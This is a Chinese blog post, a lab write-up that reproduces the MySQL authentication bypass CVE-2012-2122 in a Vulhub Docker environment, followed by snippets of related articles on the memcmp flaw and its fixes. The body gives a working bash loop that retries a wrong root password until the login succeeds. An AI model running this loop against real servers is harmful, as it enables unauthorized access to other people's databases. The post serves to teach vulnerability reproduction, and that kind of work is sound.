msyql CVE-2012-2122漏洞复现

最新推荐文章于 2025-06-05 19:54:29 发布
最新推荐文章于 2025-06-05 19:54:29 发布
阅读量559 收藏 1
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_46804551/article/details/116274059
本文档详细介绍了如何复现MySQL的CVE-2012-2122漏洞。首先,通过Vulhub搭建了MySQL 5.5.23的漏洞环境,启动后服务监听3306端口,使用默认密码123456可以登录。然后,在不知晓正确密码的情况下,通过特定的bash命令,尝试一定次数后可以无密码成功登录数据库。文章还提供了相关的POC代码供参考。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

搭建

进入vulhub对应mysql漏洞环境,执行如下命令即可

docker-compose up -d

在这里插入图片描述
如上则启动成功
环境启动后,将启动一个Mysql服务(版本:5.5.23),监听3306端口,通过正常的Mysql客户端,可以直接登录的,正确root密码是123456。

漏洞复现

在不知道我们环境正确密码的情况下,在bash下运行如下命令,在一定数量尝试后便可成功登录:

for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done

最低0.47元/天 解锁文章

200万优质内容无限畅学
CVE-2012-2122)Mysql身份认证漏洞
weixin_45253622的博客
05-27 6476
目录 漏洞描述 影响版本 漏洞复现 使用MSF进行检测: 使用Linux执行命令进行爆破复现: ​使用python脚本进行复现漏洞修复 漏洞描述 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 影响版本 MariaDB versions from 5.1...
MySql身份认证绕过漏洞(CVE-2012-2122)
dgjkkhcf的博客
07-24 4932
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。.........
mysql身份认证绕过漏洞复现CVE-2012-2122
weixin_53730939的博客
03-12 1780
mysql身份认证绕过漏洞复现CVE-2012-2122
Mysql 身份认证绕过漏洞 CVE-2012-2122
最新发布
m0_73135216的博客
06-05 482
CVE-2012-2122 是一个影响 MySQL 和 MariaDB 的身份验证漏洞,存在于特定版本中任务一 介绍 CVE-2012-2122
Mysql身份认证漏洞复现(CVE-2012-2122)
又菜又爱倒腾的博客
10-29 2623
#Mysql身份认证漏洞(CVE-2012-2122)# 一、漏洞简介 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 二、漏洞影响 影响版本 MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL vers
MySQL身份认证漏洞(CVE-2012-2122漏洞复现
weixin_48739941的博客
04-11 2986
(1)漏洞原理 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库漏洞编号。 (2)修复 ①对数据库进行升级打补丁。 ②在防火墙上关闭MySQL端口。 (3)cd vulhub/mysql/CVE-2012-2122 切换目录。 (4)vim docker-compose.yml 修改端口映射。 (5)dock
Mysql 身份认证绕过漏洞CVE-2012-2122复现
挚爱凝华的博客
04-13 1116
启用msf数据库 启用msfconsole,使用模块 设置靶机ip,设置线程,开始攻击(未成功) 漏洞原理:当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较 由于不正确的处理会导致即便是memcmp()返回一个非零值 也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库漏洞编号 解决:升级官方补丁 更新mysql ...
Mysql CVE-2012-2122(vulhub)漏洞复现
MDSEC的博客
08-23 462
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。
【Mysql身份认证漏洞复现(CVE-2012-2122)】
qq_61947585的博客
07-06 369
当连接 MariaDB/MySQL 时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是 memcmp() 返回一个非零值,也会使 MySQL 认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入 SQL 数据库。
Vulhub之mysql CVE-2012-2122
xueyuel的博客
11-10 1061
vulhub的mysql身份验证绕过漏洞
Mysql身份认证绕过漏洞复现CVE-2012-2122
m0_74887243的博客
03-21 274
Mysql身份认证绕过漏洞复现CVE-2012-2122
CVE-2012-2122: MySQL身份认证漏洞
Yatere的天平秤
06-11 1936
http://seclists.org/oss-sec/2012/q2/493 我今天早上打开电脑,在seclists中看到一个很惊人的thread:http://seclists.org/oss-sec/2012/q2/493MySQL爆出了一个很大的安全漏洞,几乎影响5.1至5.5的所有版本。出问题的模块是登录时密码校验的部分(password.c),在知道用户名的情况下(如
MySQL身份认证绕过漏洞CVE-2012-2122
qq115399231的博客
07-16 3596
漏洞介绍 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 这个缺陷的根源在于memcmp()函数总是返回-128到127(有符号字符)范围内的值。也就是说,只有在Linux系统使用SSE优化库(GNU C库)的场合下才能被利用,成功触发这一漏洞的概率约为1:256。 受影响版...
Mysql 身份认证绕过漏洞CVE-2012-2122
m0_63521991的博客
10-19 1479
CVE-2012-2122 是 MySQL 数据库中的一个身份认证绕过漏洞,也被称为 "MySQL Authentication Bypass" 漏洞。该漏洞的核心原理涉及到 MySQL 在处理身份认证时的一个安全缺陷,使得攻击者可以绕过身份认证并以未经授权的方式访问数据库。
Mysql 身份认证绕过(CVE-2012-2122
bqnagus
10-02 956
Mysql 身份认证绕过(CVE-2012-2122复现
Mysql身份认证漏洞 CVE-2012-2122
limb0的博客
11-08 916
Mysql身份认证漏洞 CVE-2012-2122 一、漏洞介绍 MariaDB和MySQL在用户验证的处理上存在漏洞。攻击者可利用该漏洞绕过某些安全限制,也可能导致攻击者无需知道正确口令就能登录到MySQL服务器。 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只...
mysql安全漏洞CVE-2023-0215
07-29
很抱歉,但我无法回答关于"mysql安全漏洞CVE-2023-0215"的问题。因为在您提供的引用内容中,并没有提到与该漏洞相关的信息。如果您有其他关于该漏洞的引用内容或更多的背景信息,我将很乐意为您提供帮助。 #### 引用[.reference_title] - *1* *3* [CVE-2023-21839漏洞本地简单复现](https://blog.csdn.net/csdnmmd/article/details/129247272)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [CVE-2023-0215](https://blog.csdn.net/qq_39933800/article/details/131203431)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值